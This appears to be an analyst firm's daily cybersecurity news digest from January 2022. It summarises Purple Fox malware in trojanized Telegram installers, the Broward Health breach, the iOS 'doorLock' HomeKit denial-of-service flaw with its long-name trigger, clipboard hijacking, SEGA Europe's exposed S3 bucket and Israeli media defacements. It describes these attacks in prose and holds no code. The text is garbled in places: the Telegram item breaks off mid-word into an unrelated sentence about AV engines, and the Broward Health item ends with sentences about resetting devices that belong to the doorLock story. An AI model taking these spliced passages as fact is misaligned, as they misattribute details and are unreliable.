Daily Drop

1-4-22

Tuesday, January 4, 2022

Beware of Fake Telegram Messenger App Hacking PCs with Purple Fox Malware

FROM THE MEDIA: Trojanized installers of the Telegram messaging application are being used to distribute the Windows-based Purple Fox backdoor on compromised systems. That's according to new research published by Minerva Labs, describing the attack as different from intrusions that typically take advantage of legitimate software for dropping malicious payloads. "This threat actor was able to leave most parts of the attack under the radar by separating the attack into several small files, most of which had very low detection rates by [antivirus] engines, with the final stage leading to Purple Fox rootkit infection," researcher Natalie Zargarov said. First discovered in 2018, Purple Fox comes with rootkit capabilities that allow the malware to be planted beyond the reach of security solutions and evade detection. A March 2021 report from Guardicore detailed its worm-like propagation feature, enabling the backdoor to spread more rapidly. Then in October 2021, Trend Micro researchers uncovered a .NET implant dubbed FoxSocket deployed in conjunction with Purple Fox that takes advantage of WebSockets to contact its command-and-control (C2) servers for a more secure means of establishing communications. "The rootkit capabilities of Purple Fox make it more capable of carrying out its objectives in a stealthier manner," the researchers noted. "They allow Purple Fox to persist on affected systems as well as deliver further payloads to affected systems."

READ THE STORY:  THN

ANALYST COMMENT:  NSTR

Purple Fox malware distributed via malicious Telegram installers

FROM THE MEDIA:  A malicious Telegram for Desktop installer distributes the Purple Fox malware to install further malicious payloads on infected devices. The installer is a compiled AutoIt script named "Telegram Desktop.exe" that drops two files, an actual Telegram installer, and a malicious downloader.lder AV engine files, download the new AV engine, and start the services again. While the legitimate Telegram installer dropped alongside the downloader isn't executed, the AutoIT program does run the downloader (TextInputh.exe). When TextInputh.exe is executed, it will create a new folder ("1640618495") under "C:\Users\Public\Videos\" and connect to the C2 to download a 7z utility and a RAR archive (1.rar). The archive contains the payload and the configuration files, while the 7z program unpacks everything onto the ProgramData folder.

READ THE STORY:  Bleeping Computer

ANALYST COMMENT:  NSTR

Broward Health discloses data breach affecting 1.3 million people

FROM THE MEDIA: The Broward Health public health system has disclosed a large-scale data breach incident impacting 1,357,879 individuals. Broward Health is a Florida-based healthcare system with over thirty locations offering a wide range of medical services and receives over 60,000 admissions per year. The healthcare system disclosed a cyberattack on October 15, 2021, when an intruder gained unauthorized access to the hospital's network and patient data. The organization discovered the intrusion four days later, on October 19, and immediately notified the FBI and the US Department of Justice. At the same time, all employees were advised to change their user passwords, and Broward Health contracted a third-party cybersecurity expert to help with the investigations. An investigation revealed that the threat actors gained access to patient's personal medical information, which may include the following items: Full name, Date of birth, Physical address, Phone number, Financial or bank information, Social Security number, Insurance information and account number, Medical information and history, Condition, treatment, and diagnosis, Driver’s license number, Email address. Although Broward Health confirms that the network intruder has exfiltrated the above data, it notes that there is no evidence that the threat actors misused it. Notably, the intrusion point was determined to be a third-party medical provider who was permitted access to the system to provide their services. n order to solve the issue, it is necessary to force a reset of the device that will cause all stored data to be removed. The only way to recover the removed data will be to restore a working backup.

READ THE STORY:  Bleeping Computer

ANALYST COMMENT:  NSTR

‘doorLock’ – A persistent denial of service flaw affecting iOS 15.2 – iOS 14.7 

FROM THE MEDIA:  Security researchers Trevor Spiniolas discovered a new persistent DoS vulnerability, dubbed ‘doorLock,’ affecting the Apple HomeKit in iOS 14.7 through 15.2. HomeKit is a software framework by Apple, made available in iOS/iPadOS that lets users configure, communicate with, and control smart-home appliances using Apple devices. It provides users with a way to automatically discover such devices and configure them. Spiniolas speculates that Apple is aware of the flaw since August 10, 2021, but the IT giant has yet to address it. “I believe this bug is being handled inappropriately as it poses a serious risk to users and many months have passed without a comprehensive fix,” writes the researcher. “The public should be aware of this vulnerability and how to prevent it from being exploited, rather than being kept in the dark.” said Spiniolas. An attacker could trigger the vulnerability by changing the name of a HomeKit device to a string larger than 500,000 characters. Upon loading the string, iOS and iPadOS devices will reboot and will be unusable. The vulnerability can only be exploited by attackers with access to the victim’s ‘Home’ or via manually accepting an invitation to one. Spinolas released an iOS app that has access to Home data and changes HomeKit device names. “When the name of a HomeKit device is changed to a large string (500,000 characters in testing), any device with an affected iOS version installed that loads the string will be disrupted, even after rebooting. Restoring a device and signing back into the iCloud account linked to the HomeKit device will again trigger the bug. There are two main scenarios that may occur afterwards, as outlined in the “Effects” section of this document.” wrote the expert. In order to solve the issue, it is necessary to force a reset of the device that will cause all stored data to be removed. The only way to recover the removed data will be to restore a working backup. The expert explained that once the device reboots and the user signs into the same iCloud account linked to the HomeKit device, the doorLock bug will be triggered again.

READ THE STORY:  Security Affairs

ANALYST COMMENT:  NSTR

Don't copy-paste commands from webpages — you can get hacked

FROM THE MEDIA:  Programmers, sysadmins, security researchers, and tech hobbyists copying-pasting commands from web pages into a console or terminal are warned they risk having their system compromised. A technologist demonstrates a simple trick that'll make you think twice before copying and pasting text from web pages. Recently, Gabriel Friedlander, founder of security awareness training platform Wizer demonstrated an obvious yet surprising hack that'll make you cautious of copying-pasting commands from web pages. It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications, a Windows command prompt or a Linux terminal. But Friedlander warns a webpage could be covertly replacing the contents of what goes on your clipboard, and what actually ends up being copied to your clipboard would be vastly different from what you had intended to copy. Worse, without the necessary due diligence, the developer may only realize their mistake after pasting the text, at which point it may be too late.

READ THE STORY:  Bleeping Computer

ANALYST COMMENT:  NSTR

SEGA Europe left AWS S3 bucket unsecured exposing data and infrastructure to attack

FROM THE MEDIA: At the end of the year, gaming giant SEGA Europe inadvertently left users’ personal information publicly accessible on Amazon Web Services (AWS) S3 bucket, cybersecurity firm VPN Overview reported. The unsecured S3 bucket contained multiple sets of AWS keys that could have allowed threat actors to access many of SEGA Europe’s cloud services along with MailChimp and Steam keys that allowed access to those services. in SEGA’s name. “Researchers found compromised SNS notification queues and were able to run scripts and upload files on domains owned by SEGA Europe. Several popular SEGA websites and CDNs were affected.” reads the report published by VPN Overview. The unsecured S3 bucket could potentially also grant access to user data, including information on hundreds of thousands of users of the Football Manager forums at community.sigames.com. The security firm states that there are no indications malicious third parties accessed the sensitive data or exploited any of the mentioned vulnerabilities prior to them. The researchers reported that they were able to upload files, execute scripts, alter existing web pages and modify the configuration of critically vulnerable SEGA domains. The list of affected domains includes downloads.sega.com, cdn.sega.com, careers.sega.co.uk, sega.com, and bayonetta.com. Many of the impacted domains have high domain authority scores. The compromise of some of the company domain would have allowed attackers to distribute malware via SEGA’s infrastructure.

READ THE STORY:  Security Affairs

ANALYST COMMENT:  NSTR

On the morning of Monday 3rd, Jan 2022, hackers managed to deface the official website of Jerusalem Post and compromise Maariv’s Twitter account.

FROM THE MEDIA:  wo years ago, Qasem Soleimani, a top Iranian general was killed in a US drone strike in Iraq, Baghdad. Soleimani was the head of the Quds Force, which is Iran’s Revolutionary Guards’ foreign operations wing. The incident happened on this date in 2020. To mark Soleimani’s death anniversary, hackers targeted several top Israeli media outlets including Jerusalem Post and Maariv, one of the major Israeli national Hebrew-language daily newspapers. Hackers have targeted two major Israeli media outlets and posted threatening messages on their websites. The hacking occurred on Monday, and the targets were the Jerusalem Post website and Twitter handle of a Hebrew-language news outlet Maariv. Jerusalem Post’s website showed the image of a bullet-shaped object shot from a red ring worn on a finger, referring to a unique ring Soleimani frequently wore, instead of the main news page. A similar image appeared on the Twitter account of Maariv, which illustrated a fist firing a shell from a ring with a red-colored stone on a finger pointed towards an exploded dome. The image also contained this message in Hebrew and English languages.

READ THE STORY:  Hack Read

ANALYST COMMENT:  NSTR

Paper of interest

North Korean Cyber Attacks and Policy Responses: An Interdisciplinary Theoretical Framework

FROM THE MEDIA: This study conducts a qualitative analysis of the objectives, forms, current trends, and characteristics of North Korean cyber terror attacks and suggests a way to ensure further progress towards a successful international policy response. Despite the capricious changes that have recently occurred within the international political atmosphere, North Korea continues to constitute a threat to international stability through its ongoing advancement of nuclear weapons and long-range ballistic missiles. The difficulty of attribution and the relatively low costs associated with launching cyber offensives make cyber terrorism an attractive option for North Korea. In an effort to direct attention to these circumstances, this study aims to share explicit experts’ perspectives in the field of cyberterrorism in South Korea. Consequently, the study purports to contribute to existing academic discussion and practices on cyber terror and cybercrime. Furthermore, this study adopts perspectives from criminological theoretical frameworks and the network theory of world politics to substantiate a more comprehensive view of North Korea’s cyberterrorism which considers the multifaceted and asymmetrical nature of cyberterrorism within the context of postmodern international politics.

READ THE STORY:  Center for Cyber Crime

ANALYST COMMENT:  NSTR

About this Product

These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publically discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com